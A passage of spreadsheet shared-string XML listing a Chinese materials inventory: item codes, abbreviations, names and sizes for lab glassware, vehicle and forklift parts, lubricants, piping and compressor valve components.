    <t>QD</t>
  </si>
  <si>
    <t>球胆</t>
  </si>
  <si>
    <t>04060821-1</t>
  </si>
  <si>
    <t>gkp</t>
  </si>
  <si>
    <t>广口瓶</t>
  </si>
  <si>
    <t>250ml</t>
  </si>
  <si>
    <t>04060825</t>
  </si>
  <si>
    <t>dj</t>
  </si>
  <si>
    <t>电极</t>
  </si>
  <si>
    <t>04060825-1</t>
  </si>
  <si>
    <t>小电珠</t>
  </si>
  <si>
    <t>04060829</t>
  </si>
  <si>
    <t>yb</t>
  </si>
  <si>
    <t>研钵</t>
  </si>
  <si>
    <t>04060830</t>
  </si>
  <si>
    <t>JS</t>
  </si>
  <si>
    <t>胶塞</t>
  </si>
  <si>
    <t>04060833</t>
  </si>
  <si>
    <t>滴管</t>
  </si>
  <si>
    <t>04060839</t>
  </si>
  <si>
    <t>滴瓶</t>
  </si>
  <si>
    <t>04060844</t>
  </si>
  <si>
    <t>ym</t>
  </si>
  <si>
    <t>药棉</t>
  </si>
  <si>
    <t>500g</t>
  </si>
  <si>
    <t>04060847</t>
  </si>
  <si>
    <t>QTLLJ</t>
  </si>
  <si>
    <t>气体流量计</t>
  </si>
  <si>
    <t>04060858</t>
  </si>
  <si>
    <t>GG</t>
  </si>
  <si>
    <t>坩埚</t>
  </si>
  <si>
    <t>04060881</t>
  </si>
  <si>
    <t>BSM</t>
  </si>
  <si>
    <t>比色皿</t>
  </si>
  <si>
    <t>3cm</t>
  </si>
  <si>
    <t>04060886-4</t>
  </si>
  <si>
    <t>rlp</t>
  </si>
  <si>
    <t>容量瓶</t>
  </si>
  <si>
    <t>1000ml</t>
  </si>
  <si>
    <t>04060888</t>
  </si>
  <si>
    <t>SLP</t>
  </si>
  <si>
    <t>塑料瓶</t>
  </si>
  <si>
    <t>04060890-2</t>
  </si>
  <si>
    <t>sb</t>
  </si>
  <si>
    <t>烧杯</t>
  </si>
  <si>
    <t>50</t>
  </si>
  <si>
    <t>04060890-3</t>
  </si>
  <si>
    <t>04060895</t>
  </si>
  <si>
    <t>lt</t>
  </si>
  <si>
    <t>高硼硅量筒</t>
  </si>
  <si>
    <t>04060895-1</t>
  </si>
  <si>
    <t>sg</t>
  </si>
  <si>
    <t>试管</t>
  </si>
  <si>
    <t>100ml</t>
  </si>
  <si>
    <t>04060897</t>
  </si>
  <si>
    <t>XKP</t>
  </si>
  <si>
    <t>细口瓶</t>
  </si>
  <si>
    <t>1000ML</t>
  </si>
  <si>
    <t>04060901</t>
  </si>
  <si>
    <t>LYZ</t>
  </si>
  <si>
    <t>大滤纸</t>
  </si>
  <si>
    <t>04060904</t>
  </si>
  <si>
    <t>721DP</t>
  </si>
  <si>
    <t>721灯泡</t>
  </si>
  <si>
    <t>04060905</t>
  </si>
  <si>
    <t>drg</t>
  </si>
  <si>
    <t>电热管</t>
  </si>
  <si>
    <t>04060908-1</t>
  </si>
  <si>
    <t>gzq</t>
  </si>
  <si>
    <t>04060924</t>
  </si>
  <si>
    <t>sjp</t>
  </si>
  <si>
    <t>试剂瓶</t>
  </si>
  <si>
    <t>04060925</t>
  </si>
  <si>
    <t>xlg</t>
  </si>
  <si>
    <t>吸量管</t>
  </si>
  <si>
    <t>1ml</t>
  </si>
  <si>
    <t>04060925-1</t>
  </si>
  <si>
    <t>5ml</t>
  </si>
  <si>
    <t>04060925-2</t>
  </si>
  <si>
    <t>2ml</t>
  </si>
  <si>
    <t>04060926</t>
  </si>
  <si>
    <t>fxtp</t>
  </si>
  <si>
    <t>全机械分析天平</t>
  </si>
  <si>
    <t>04060929</t>
  </si>
  <si>
    <t>三角瓶</t>
  </si>
  <si>
    <t>04060932</t>
  </si>
  <si>
    <t>jmm</t>
  </si>
  <si>
    <t>精密表</t>
  </si>
  <si>
    <t>04060932-1</t>
  </si>
  <si>
    <t>50-100</t>
  </si>
  <si>
    <t>04060933</t>
  </si>
  <si>
    <t>lxbzj</t>
  </si>
  <si>
    <t>梨形比重瓶</t>
  </si>
  <si>
    <t>10ml</t>
  </si>
  <si>
    <t>04070301</t>
  </si>
  <si>
    <t>CQ</t>
  </si>
  <si>
    <t>齿圈</t>
  </si>
  <si>
    <t>04070302</t>
  </si>
  <si>
    <t>ssj</t>
  </si>
  <si>
    <t>倒视镜</t>
  </si>
  <si>
    <t>04070310-1</t>
  </si>
  <si>
    <t>700-12</t>
  </si>
  <si>
    <t>04070311</t>
  </si>
  <si>
    <t>04070311-1</t>
  </si>
  <si>
    <t>zxj</t>
  </si>
  <si>
    <t>转向机</t>
  </si>
  <si>
    <t>04070311-2</t>
  </si>
  <si>
    <t>lgt</t>
  </si>
  <si>
    <t>连杆套</t>
  </si>
  <si>
    <t>04070312</t>
  </si>
  <si>
    <t>GQ</t>
  </si>
  <si>
    <t>钢圈</t>
  </si>
  <si>
    <t>04070313-10</t>
  </si>
  <si>
    <t>28*9-15</t>
  </si>
  <si>
    <t>04070313-2</t>
  </si>
  <si>
    <t>975-18</t>
  </si>
  <si>
    <t>04070313-6</t>
  </si>
  <si>
    <t>600-9</t>
  </si>
  <si>
    <t>04070313-7</t>
  </si>
  <si>
    <t>450-14</t>
  </si>
  <si>
    <t>04070314-1</t>
  </si>
  <si>
    <t>kqg</t>
  </si>
  <si>
    <t>空气管</t>
  </si>
  <si>
    <t>04070314-2</t>
  </si>
  <si>
    <t>qmtg</t>
  </si>
  <si>
    <t>气门挺杆</t>
  </si>
  <si>
    <t>04070315</t>
  </si>
  <si>
    <t>jQM</t>
  </si>
  <si>
    <t>进气门</t>
  </si>
  <si>
    <t>04070316</t>
  </si>
  <si>
    <t>QMK</t>
  </si>
  <si>
    <t>气门口</t>
  </si>
  <si>
    <t>04070317</t>
  </si>
  <si>
    <t>QMYG</t>
  </si>
  <si>
    <t>气门压盖</t>
  </si>
  <si>
    <t>04070320-1</t>
  </si>
  <si>
    <t>zt</t>
  </si>
  <si>
    <t>04070322</t>
  </si>
  <si>
    <t>zymfj</t>
  </si>
  <si>
    <t>专用密封剂</t>
  </si>
  <si>
    <t>TXY-18</t>
  </si>
  <si>
    <t>04070322-1</t>
  </si>
  <si>
    <t>ZYMFJ</t>
  </si>
  <si>
    <t>TXY-16</t>
  </si>
  <si>
    <t>04070323</t>
  </si>
  <si>
    <t>OJCD</t>
  </si>
  <si>
    <t>O角齿垫</t>
  </si>
  <si>
    <t>04070323-1</t>
  </si>
  <si>
    <t>qcd</t>
  </si>
  <si>
    <t>全车垫</t>
  </si>
  <si>
    <t>04070324--1</t>
  </si>
  <si>
    <t>NT30</t>
  </si>
  <si>
    <t>内胎</t>
  </si>
  <si>
    <t>04070324--2</t>
  </si>
  <si>
    <t>NT50</t>
  </si>
  <si>
    <t>04070324-8</t>
  </si>
  <si>
    <t>nt</t>
  </si>
  <si>
    <t>16/70-20</t>
  </si>
  <si>
    <t>04070326</t>
  </si>
  <si>
    <t>jlxXLB</t>
  </si>
  <si>
    <t>机滤芯修理包</t>
  </si>
  <si>
    <t>04070326-1</t>
  </si>
  <si>
    <t>jyxlb</t>
  </si>
  <si>
    <t>机油修理包</t>
  </si>
  <si>
    <t>04070328</t>
  </si>
  <si>
    <t>F</t>
  </si>
  <si>
    <t>阀</t>
  </si>
  <si>
    <t>04070329</t>
  </si>
  <si>
    <t>XHX</t>
  </si>
  <si>
    <t>油门拉线</t>
  </si>
  <si>
    <t>04070330</t>
  </si>
  <si>
    <t>DLZ</t>
  </si>
  <si>
    <t>导轮座</t>
  </si>
  <si>
    <t>04070332</t>
  </si>
  <si>
    <t>klzc</t>
  </si>
  <si>
    <t>机滤总成</t>
  </si>
  <si>
    <t>04070336-1</t>
  </si>
  <si>
    <t>jqgd</t>
  </si>
  <si>
    <t>进气管垫</t>
  </si>
  <si>
    <t>04070336-2</t>
  </si>
  <si>
    <t>qmsd</t>
  </si>
  <si>
    <t>气门室垫</t>
  </si>
  <si>
    <t>04070336-3</t>
  </si>
  <si>
    <t>pqgd</t>
  </si>
  <si>
    <t>排气管垫</t>
  </si>
  <si>
    <t>04070338</t>
  </si>
  <si>
    <t>FLZ</t>
  </si>
  <si>
    <t>分离爪</t>
  </si>
  <si>
    <t>04070340-1</t>
  </si>
  <si>
    <t>h</t>
  </si>
  <si>
    <t>环</t>
  </si>
  <si>
    <t>04070343</t>
  </si>
  <si>
    <t>CCBC</t>
  </si>
  <si>
    <t>铲车拨叉</t>
  </si>
  <si>
    <t>04070349</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>垫</t>
  </si>
  <si>
    <t>04070352</t>
  </si>
  <si>
    <t>H</t>
  </si>
  <si>
    <t>簧</t>
  </si>
  <si>
    <t>04070354</t>
  </si>
  <si>
    <t>XYQ</t>
  </si>
  <si>
    <t>消音器</t>
  </si>
  <si>
    <t>04070355</t>
  </si>
  <si>
    <t>rz</t>
  </si>
  <si>
    <t>软轴</t>
  </si>
  <si>
    <t>04070358</t>
  </si>
  <si>
    <t>SCP</t>
  </si>
  <si>
    <t>刹车片</t>
  </si>
  <si>
    <t>04070359</t>
  </si>
  <si>
    <t>ZXJ</t>
  </si>
  <si>
    <t>转向节</t>
  </si>
  <si>
    <t>04070363</t>
  </si>
  <si>
    <t>HHS</t>
  </si>
  <si>
    <t>球头</t>
  </si>
  <si>
    <t>04070365</t>
  </si>
  <si>
    <t>滤清器</t>
  </si>
  <si>
    <t>CX0708</t>
  </si>
  <si>
    <t>04070365-3</t>
  </si>
  <si>
    <t>kqlqq</t>
  </si>
  <si>
    <t>空气滤清器</t>
  </si>
  <si>
    <t>04070366</t>
  </si>
  <si>
    <t>CYB</t>
  </si>
  <si>
    <t>柴油泵</t>
  </si>
  <si>
    <t>04070366-1</t>
  </si>
  <si>
    <t>行车/转向</t>
  </si>
  <si>
    <t>04070369-1</t>
  </si>
  <si>
    <t>clqqzc</t>
  </si>
  <si>
    <t>柴滤清器总成</t>
  </si>
  <si>
    <t>04070370</t>
  </si>
  <si>
    <t>sbb</t>
  </si>
  <si>
    <t>手导泵</t>
  </si>
  <si>
    <t>04070377</t>
  </si>
  <si>
    <t>lgz</t>
  </si>
  <si>
    <t>连杆轴</t>
  </si>
  <si>
    <t>04070378</t>
  </si>
  <si>
    <t>空滤器</t>
  </si>
  <si>
    <t>04070380</t>
  </si>
  <si>
    <t>04070382-1</t>
  </si>
  <si>
    <t>fgj</t>
  </si>
  <si>
    <t>反光镜</t>
  </si>
  <si>
    <t>04070384</t>
  </si>
  <si>
    <t>ybt</t>
  </si>
  <si>
    <t>摇臂套</t>
  </si>
  <si>
    <t>04070389</t>
  </si>
  <si>
    <t>g</t>
  </si>
  <si>
    <t>管</t>
  </si>
  <si>
    <t>04070391-1</t>
  </si>
  <si>
    <t>sczc</t>
  </si>
  <si>
    <t>刹车总成</t>
  </si>
  <si>
    <t>ZDY12-4</t>
  </si>
  <si>
    <t>04070392-1</t>
  </si>
  <si>
    <t>zj</t>
  </si>
  <si>
    <t>隔离架</t>
  </si>
  <si>
    <t>04070393</t>
  </si>
  <si>
    <t>gyyb</t>
  </si>
  <si>
    <t>高压油泵</t>
  </si>
  <si>
    <t>04070396</t>
  </si>
  <si>
    <t>sxg</t>
  </si>
  <si>
    <t>水箱管</t>
  </si>
  <si>
    <t>04070397-2</t>
  </si>
  <si>
    <t>tlzw</t>
  </si>
  <si>
    <t>凸轮轴瓦</t>
  </si>
  <si>
    <t>04070398</t>
  </si>
  <si>
    <t>ydyk</t>
  </si>
  <si>
    <t>油底压块</t>
  </si>
  <si>
    <t>04070399</t>
  </si>
  <si>
    <t>pqwg</t>
  </si>
  <si>
    <t>排气弯管</t>
  </si>
  <si>
    <t>04070403</t>
  </si>
  <si>
    <t>气门YF</t>
  </si>
  <si>
    <t>气门油封</t>
  </si>
  <si>
    <t>04070404</t>
  </si>
  <si>
    <t>syB</t>
  </si>
  <si>
    <t>输油泵</t>
  </si>
  <si>
    <t>04070406</t>
  </si>
  <si>
    <t>04070406-2</t>
  </si>
  <si>
    <t>lgls</t>
  </si>
  <si>
    <t>轮网</t>
  </si>
  <si>
    <t>前轮</t>
  </si>
  <si>
    <t>04070407</t>
  </si>
  <si>
    <t>zsF</t>
  </si>
  <si>
    <t>注射阀</t>
  </si>
  <si>
    <t>04070409</t>
  </si>
  <si>
    <t>CL小</t>
  </si>
  <si>
    <t>齿轮</t>
  </si>
  <si>
    <t>小</t>
  </si>
  <si>
    <t>04070410</t>
  </si>
  <si>
    <t>qzCL</t>
  </si>
  <si>
    <t>曲轴齿轮</t>
  </si>
  <si>
    <t>04070411</t>
  </si>
  <si>
    <t>DP10W</t>
  </si>
  <si>
    <t>卡特灯泡</t>
  </si>
  <si>
    <t>04070412</t>
  </si>
  <si>
    <t>PDL</t>
  </si>
  <si>
    <t>皮带轮</t>
  </si>
  <si>
    <t>04070414</t>
  </si>
  <si>
    <t>sSG</t>
  </si>
  <si>
    <t>上水管</t>
  </si>
  <si>
    <t>04070415</t>
  </si>
  <si>
    <t>SB</t>
  </si>
  <si>
    <t>04070416-1</t>
  </si>
  <si>
    <t>msp</t>
  </si>
  <si>
    <t>摩沙片</t>
  </si>
  <si>
    <t>04070420</t>
  </si>
  <si>
    <t>GYS</t>
  </si>
  <si>
    <t>感应塞</t>
  </si>
  <si>
    <t>04070421</t>
  </si>
  <si>
    <t>DDZ</t>
  </si>
  <si>
    <t>倒档轴</t>
  </si>
  <si>
    <t>04070423</t>
  </si>
  <si>
    <t>ZDZB</t>
  </si>
  <si>
    <t>制动泵</t>
  </si>
  <si>
    <t>04070426</t>
  </si>
  <si>
    <t>04070428</t>
  </si>
  <si>
    <t>JYLX</t>
  </si>
  <si>
    <t>机油滤芯</t>
  </si>
  <si>
    <t>04070430</t>
  </si>
  <si>
    <t>ybpzc</t>
  </si>
  <si>
    <t>仪表盘总成</t>
  </si>
  <si>
    <t>04070432</t>
  </si>
  <si>
    <t>04070433</t>
  </si>
  <si>
    <t>PJC</t>
  </si>
  <si>
    <t>盆角齿</t>
  </si>
  <si>
    <t>04070434</t>
  </si>
  <si>
    <t>04070435-1</t>
  </si>
  <si>
    <t>gzd</t>
  </si>
  <si>
    <t>卡特灯</t>
  </si>
  <si>
    <t>04070437</t>
  </si>
  <si>
    <t>dz</t>
  </si>
  <si>
    <t>挡轴</t>
  </si>
  <si>
    <t>04070438</t>
  </si>
  <si>
    <t>qdj</t>
  </si>
  <si>
    <t>起动机</t>
  </si>
  <si>
    <t>04070439</t>
  </si>
  <si>
    <t>弹簧座</t>
  </si>
  <si>
    <t>04070441</t>
  </si>
  <si>
    <t>ZDZT</t>
  </si>
  <si>
    <t>制动之通</t>
  </si>
  <si>
    <t>04070442</t>
  </si>
  <si>
    <t>zxb</t>
  </si>
  <si>
    <t>转向泵</t>
  </si>
  <si>
    <t>04070443</t>
  </si>
  <si>
    <t>QZW</t>
  </si>
  <si>
    <t>曲轴瓦</t>
  </si>
  <si>
    <t>04070444</t>
  </si>
  <si>
    <t>qGD</t>
  </si>
  <si>
    <t>气缸垫</t>
  </si>
  <si>
    <t>04070448</t>
  </si>
  <si>
    <t>机体</t>
  </si>
  <si>
    <t>04070449--1</t>
  </si>
  <si>
    <t>SX10#</t>
  </si>
  <si>
    <t>04070449-3</t>
  </si>
  <si>
    <t>sx</t>
  </si>
  <si>
    <t>04070449-4</t>
  </si>
  <si>
    <t>SX</t>
  </si>
  <si>
    <t>叉车2.5T</t>
  </si>
  <si>
    <t>04070450</t>
  </si>
  <si>
    <t>QZ</t>
  </si>
  <si>
    <t>卡子</t>
  </si>
  <si>
    <t>04070452</t>
  </si>
  <si>
    <t>KQLX</t>
  </si>
  <si>
    <t>空气滤芯</t>
  </si>
  <si>
    <t>04070453--2</t>
  </si>
  <si>
    <t>LT23.5--25</t>
  </si>
  <si>
    <t>23.5--25</t>
  </si>
  <si>
    <t>04070454--1</t>
  </si>
  <si>
    <t>XZ10#</t>
  </si>
  <si>
    <t>销子</t>
  </si>
  <si>
    <t>10#</t>
  </si>
  <si>
    <t>04070454--2</t>
  </si>
  <si>
    <t>XZ30#</t>
  </si>
  <si>
    <t>04070455--1</t>
  </si>
  <si>
    <t>T10#</t>
  </si>
  <si>
    <t>04070455--2</t>
  </si>
  <si>
    <t>T30#</t>
  </si>
  <si>
    <t>04070455--3</t>
  </si>
  <si>
    <t>T50#</t>
  </si>
  <si>
    <t>04070456</t>
  </si>
  <si>
    <t>jysrq</t>
  </si>
  <si>
    <t>机油散热器</t>
  </si>
  <si>
    <t>04070457</t>
  </si>
  <si>
    <t>PYB</t>
  </si>
  <si>
    <t>喷油泵</t>
  </si>
  <si>
    <t>04070458</t>
  </si>
  <si>
    <t>04070460</t>
  </si>
  <si>
    <t>04070462</t>
  </si>
  <si>
    <t>FLZC</t>
  </si>
  <si>
    <t>分离轴承</t>
  </si>
  <si>
    <t>04070463</t>
  </si>
  <si>
    <t>fsg</t>
  </si>
  <si>
    <t>分水管</t>
  </si>
  <si>
    <t>04070464</t>
  </si>
  <si>
    <t>ZBSG</t>
  </si>
  <si>
    <t>主变速杆</t>
  </si>
  <si>
    <t>04070467</t>
  </si>
  <si>
    <t>Z</t>
  </si>
  <si>
    <t>04070468</t>
  </si>
  <si>
    <t>BCZ</t>
  </si>
  <si>
    <t>拨叉轴</t>
  </si>
  <si>
    <t>04070470</t>
  </si>
  <si>
    <t>GDJHT</t>
  </si>
  <si>
    <t>高低结合套</t>
  </si>
  <si>
    <t>04070470-1</t>
  </si>
  <si>
    <t>qzyft</t>
  </si>
  <si>
    <t>曲轴油封套</t>
  </si>
  <si>
    <t>04070476</t>
  </si>
  <si>
    <t>mfQ</t>
  </si>
  <si>
    <t>B100*125*12</t>
  </si>
  <si>
    <t>04070477</t>
  </si>
  <si>
    <t>CDZ</t>
  </si>
  <si>
    <t>传动轴</t>
  </si>
  <si>
    <t>04070478</t>
  </si>
  <si>
    <t>ZXQ</t>
  </si>
  <si>
    <t>转向器</t>
  </si>
  <si>
    <t>04070479</t>
  </si>
  <si>
    <t>YBZC</t>
  </si>
  <si>
    <t>摇臂总成</t>
  </si>
  <si>
    <t>04070482</t>
  </si>
  <si>
    <t>bjylqq</t>
  </si>
  <si>
    <t>变矩器冷却器</t>
  </si>
  <si>
    <t>04070486</t>
  </si>
  <si>
    <t>zyq</t>
  </si>
  <si>
    <t>增压器</t>
  </si>
  <si>
    <t>04070487</t>
  </si>
  <si>
    <t>TJ</t>
  </si>
  <si>
    <t>托架</t>
  </si>
  <si>
    <t>04070488</t>
  </si>
  <si>
    <t>szzc</t>
  </si>
  <si>
    <t>十字轴承</t>
  </si>
  <si>
    <t>04070492</t>
  </si>
  <si>
    <t>gtz</t>
  </si>
  <si>
    <t>缸头罩</t>
  </si>
  <si>
    <t>04070494</t>
  </si>
  <si>
    <t>QB</t>
  </si>
  <si>
    <t>气泵</t>
  </si>
  <si>
    <t>04070495</t>
  </si>
  <si>
    <t>qygQ</t>
  </si>
  <si>
    <t>前雨刮器</t>
  </si>
  <si>
    <t>04070499</t>
  </si>
  <si>
    <t>JLBz</t>
  </si>
  <si>
    <t>加力泵</t>
  </si>
  <si>
    <t>04070503</t>
  </si>
  <si>
    <t>scfb</t>
  </si>
  <si>
    <t>刹车泵</t>
  </si>
  <si>
    <t>04070507</t>
  </si>
  <si>
    <t>ysxt</t>
  </si>
  <si>
    <t>铁管</t>
  </si>
  <si>
    <t>9F20-281600</t>
  </si>
  <si>
    <t>04070522</t>
  </si>
  <si>
    <t>ylkzf</t>
  </si>
  <si>
    <t>压力控制阀</t>
  </si>
  <si>
    <t>04070523</t>
  </si>
  <si>
    <t>ddzkg</t>
  </si>
  <si>
    <t>点火开关</t>
  </si>
  <si>
    <t>04070525</t>
  </si>
  <si>
    <t>yyg</t>
  </si>
  <si>
    <t>液压缸</t>
  </si>
  <si>
    <t>04070530</t>
  </si>
  <si>
    <t>ljB</t>
  </si>
  <si>
    <t>连接板</t>
  </si>
  <si>
    <t>04070533</t>
  </si>
  <si>
    <t>fxj</t>
  </si>
  <si>
    <t>方向机</t>
  </si>
  <si>
    <t>04070539</t>
  </si>
  <si>
    <t>zxg</t>
  </si>
  <si>
    <t>转向缸</t>
  </si>
  <si>
    <t>04070540</t>
  </si>
  <si>
    <t>mxjc</t>
  </si>
  <si>
    <t>末向角齿</t>
  </si>
  <si>
    <t>04070541</t>
  </si>
  <si>
    <t>jgwt</t>
  </si>
  <si>
    <t>胶管弯头</t>
  </si>
  <si>
    <t>04070542</t>
  </si>
  <si>
    <t>qgg</t>
  </si>
  <si>
    <t>气缸盖</t>
  </si>
  <si>
    <t>04070546</t>
  </si>
  <si>
    <t>04070550</t>
  </si>
  <si>
    <t>lg</t>
  </si>
  <si>
    <t>轮毂</t>
  </si>
  <si>
    <t>04070552</t>
  </si>
  <si>
    <t>ty</t>
  </si>
  <si>
    <t>凸缘</t>
  </si>
  <si>
    <t>04070557</t>
  </si>
  <si>
    <t>qcx</t>
  </si>
  <si>
    <t>全车线</t>
  </si>
  <si>
    <t>04070790</t>
  </si>
  <si>
    <t>zhf</t>
  </si>
  <si>
    <t>组合阀</t>
  </si>
  <si>
    <t>04700370</t>
  </si>
  <si>
    <t>txb</t>
  </si>
  <si>
    <t>弹性板</t>
  </si>
  <si>
    <t>050101001</t>
  </si>
  <si>
    <t>CY</t>
  </si>
  <si>
    <t>柴油</t>
  </si>
  <si>
    <t>050101003</t>
  </si>
  <si>
    <t>YSJY150#</t>
  </si>
  <si>
    <t>压缩机油</t>
  </si>
  <si>
    <t>100/150#</t>
  </si>
  <si>
    <t>050101005</t>
  </si>
  <si>
    <t>elhm</t>
  </si>
  <si>
    <t>二硫化钼</t>
  </si>
  <si>
    <t>050101009</t>
  </si>
  <si>
    <t>QLJY</t>
  </si>
  <si>
    <t>汽轮机油</t>
  </si>
  <si>
    <t>050101015</t>
  </si>
  <si>
    <t>CLY100#-150#</t>
  </si>
  <si>
    <t>齿轮油</t>
  </si>
  <si>
    <t>050101016</t>
  </si>
  <si>
    <t>CJY30#-40#</t>
  </si>
  <si>
    <t>柴机油</t>
  </si>
  <si>
    <t>30#-40#</t>
  </si>
  <si>
    <t>050101020</t>
  </si>
  <si>
    <t>FDY</t>
  </si>
  <si>
    <t>防冻液</t>
  </si>
  <si>
    <t>050101022</t>
  </si>
  <si>
    <t>JCY</t>
  </si>
  <si>
    <t>基础油</t>
  </si>
  <si>
    <t>050202005</t>
  </si>
  <si>
    <t>腊线</t>
  </si>
  <si>
    <t>050202009</t>
  </si>
  <si>
    <t>YQP</t>
  </si>
  <si>
    <t>氧气瓶</t>
  </si>
  <si>
    <t>06010607</t>
  </si>
  <si>
    <t>道轨</t>
  </si>
  <si>
    <t>06010737</t>
  </si>
  <si>
    <t>GG$720</t>
  </si>
  <si>
    <t>螺旋管</t>
  </si>
  <si>
    <t>$720</t>
  </si>
  <si>
    <t>06010750</t>
  </si>
  <si>
    <t>GK</t>
  </si>
  <si>
    <t>PVC管卡</t>
  </si>
  <si>
    <t>06010751</t>
  </si>
  <si>
    <t>PVCST</t>
  </si>
  <si>
    <t>PP三通</t>
  </si>
  <si>
    <t>06010755</t>
  </si>
  <si>
    <t>PVCJ</t>
  </si>
  <si>
    <t>PVC胶</t>
  </si>
  <si>
    <t>桶</t>
  </si>
  <si>
    <t>06010756</t>
  </si>
  <si>
    <t>PVC</t>
  </si>
  <si>
    <t>06010757</t>
  </si>
  <si>
    <t>PVCWT</t>
  </si>
  <si>
    <t>PP弯头</t>
  </si>
  <si>
    <t>06010842</t>
  </si>
  <si>
    <t>铜管</t>
  </si>
  <si>
    <t>19*1</t>
  </si>
  <si>
    <t>06010845</t>
  </si>
  <si>
    <t>TB</t>
  </si>
  <si>
    <t>铜棒</t>
  </si>
  <si>
    <t>06010846</t>
  </si>
  <si>
    <t>06010862</t>
  </si>
  <si>
    <t>铜皮</t>
  </si>
  <si>
    <t>06010878</t>
  </si>
  <si>
    <t>BSHJ</t>
  </si>
  <si>
    <t>巴士合金</t>
  </si>
  <si>
    <t>06010881</t>
  </si>
  <si>
    <t>DHG</t>
  </si>
  <si>
    <t>钝化膏</t>
  </si>
  <si>
    <t>06020902</t>
  </si>
  <si>
    <t>NRS</t>
  </si>
  <si>
    <t>尼龙绳</t>
  </si>
  <si>
    <t>06020906</t>
  </si>
  <si>
    <t>06020908</t>
  </si>
  <si>
    <t>XBQ</t>
  </si>
  <si>
    <t>小便器</t>
  </si>
  <si>
    <t>06020913</t>
  </si>
  <si>
    <t>YMG</t>
  </si>
  <si>
    <t>岩棉管</t>
  </si>
  <si>
    <t>06020916</t>
  </si>
  <si>
    <t>YZ</t>
  </si>
  <si>
    <t>油毡</t>
  </si>
  <si>
    <t>06020921</t>
  </si>
  <si>
    <t>BWZ</t>
  </si>
  <si>
    <t>保温砖</t>
  </si>
  <si>
    <t>06020930</t>
  </si>
  <si>
    <t>SMB</t>
  </si>
  <si>
    <t>石棉板</t>
  </si>
  <si>
    <t>06020931</t>
  </si>
  <si>
    <t>SMD</t>
  </si>
  <si>
    <t>石棉垫</t>
  </si>
  <si>
    <t>06020937</t>
  </si>
  <si>
    <t>MG</t>
  </si>
  <si>
    <t>木杆</t>
  </si>
  <si>
    <t>06020943</t>
  </si>
  <si>
    <t>GWJN</t>
  </si>
  <si>
    <t>高温胶泥</t>
  </si>
  <si>
    <t>06020955</t>
  </si>
  <si>
    <t>YT</t>
  </si>
  <si>
    <t>06020958</t>
  </si>
  <si>
    <t>SN</t>
  </si>
  <si>
    <t>水泥</t>
  </si>
  <si>
    <t>废  失效</t>
  </si>
  <si>
    <t>06020962</t>
  </si>
  <si>
    <t>SMPG</t>
  </si>
  <si>
    <t>石墨盘根</t>
  </si>
  <si>
    <t>06020963</t>
  </si>
  <si>
    <t>FBJN</t>
  </si>
  <si>
    <t>防爆胶泥</t>
  </si>
  <si>
    <t>06020987</t>
  </si>
  <si>
    <t>橡胶条</t>
  </si>
  <si>
    <t>07010101</t>
  </si>
  <si>
    <t>YDFZ50压缩机</t>
  </si>
  <si>
    <t>一段阀组</t>
  </si>
  <si>
    <t>50压缩机</t>
  </si>
  <si>
    <t>07010102</t>
  </si>
  <si>
    <t>EDFZ4M12(9)</t>
  </si>
  <si>
    <t>二段阀组</t>
  </si>
  <si>
    <t>4M12(9)</t>
  </si>
  <si>
    <t>07010103</t>
  </si>
  <si>
    <t>SDFZ4M12(9)</t>
  </si>
  <si>
    <t>三段阀组</t>
  </si>
  <si>
    <t>07010104</t>
  </si>
  <si>
    <t>四段阀组</t>
  </si>
  <si>
    <t>07010105</t>
  </si>
  <si>
    <t>WDFZ4M12(9)</t>
  </si>
  <si>
    <t>五段阀组</t>
  </si>
  <si>
    <t>07010106</t>
  </si>
  <si>
    <t>YDFZ4M12(9)</t>
  </si>
  <si>
    <t>一段阀座</t>
  </si>
  <si>
    <t>07010107</t>
  </si>
  <si>
    <t>二段阀座</t>
  </si>
  <si>
    <t>07010108</t>
  </si>
  <si>
    <t>三段阀座</t>
  </si>
  <si>
    <t>07010109</t>
  </si>
  <si>
    <t>四段阀座</t>
  </si>
  <si>
    <t>07010110</t>
  </si>
  <si>
    <t>五段阀座</t>
  </si>
  <si>
    <t>07010111</t>
  </si>
  <si>
    <t>YDXZQ4M12(9)</t>
  </si>
  <si>
    <t>一段限制器</t>
  </si>
  <si>
    <t>07010112</t>
  </si>
  <si>
    <t>EDXZQ4M12(9)</t>
  </si>
  <si>
    <t>二段限制器</t>
  </si>
  <si>
    <t>07010113</t>
  </si>
  <si>
    <t>SDXZQ4M12(9)</t>
  </si>
  <si>
    <t>三段限制器</t>
  </si>
  <si>
    <t>07010114</t>
  </si>
  <si>
    <t>四段限制器</t>
  </si>
  <si>
    <t>07010115</t>
  </si>
  <si>
    <t>WDXZQ4M12(9)</t>
  </si>
  <si>
    <t>五段限制器</t>
  </si>
  <si>
    <t>07010116</t>
  </si>
  <si>
    <t>YDHMD4M12(9)</t>
  </si>
  <si>
    <t>一段活门垫</t>
  </si>
  <si>
    <t>07010117</t>
  </si>
  <si>
    <t>EDHMD4M12(9)</t>
  </si>
  <si>
    <t>二段活门垫</t>
  </si>
  <si>
    <t>07010118</t>
  </si>
  <si>
    <t>SDHMD4M12(9)</t>
  </si>
  <si>
    <t>三段活门垫</t>
  </si>
  <si>
    <t>07010119</t>
  </si>
  <si>
    <t>四段活门垫</t>
  </si>
  <si>
    <t>07010120</t>
  </si>
  <si>
    <t>WDHMD4M12(9)</t>
  </si>
  <si>
    <t>五段活门垫</t>
  </si>
  <si>
    <t>07010121</t>
  </si>
  <si>
    <t>LG03-00</t>
  </si>
  <si>
    <t>03-00</t>
  </si>
  <si>
    <t>07010122</t>
  </si>
  <si>
    <t>JHQ04-02A</t>
  </si>
  <si>
    <t>结合器</t>
  </si>
  <si>
    <t>04-02A</t>
  </si>
  <si>
    <t>07010123</t>
  </si>
  <si>
    <t>TLH32-07</t>
  </si>
  <si>
    <t>填料盒</t>
  </si>
  <si>
    <t>32-07</t>
  </si>
  <si>
    <t>07010124</t>
  </si>
  <si>
    <t>T32-08</t>
  </si>
  <si>
    <t>套（不锈钢）</t>
  </si>
  <si>
    <t>32-08</t>
  </si>
  <si>
    <t>07010125</t>
  </si>
  <si>
    <t>FP255*2.5</t>
  </si>
  <si>
    <t>255*2.5</t>
  </si>
  <si>
    <t>07010125-1</t>
  </si>
  <si>
    <t>FP</t>
  </si>
  <si>
    <t>245*2.5</t>
  </si>
  <si>
    <t>07010126-1</t>
  </si>
  <si>
    <t>210*2.5</t>
  </si>
  <si>
    <t>07010127</t>
  </si>
  <si>
    <t>FP185*2.5</t>
  </si>
  <si>
    <t>185*2.5</t>
  </si>
  <si>
    <t>07010127-1</t>
  </si>
  <si>
    <t>175*2.5</t>
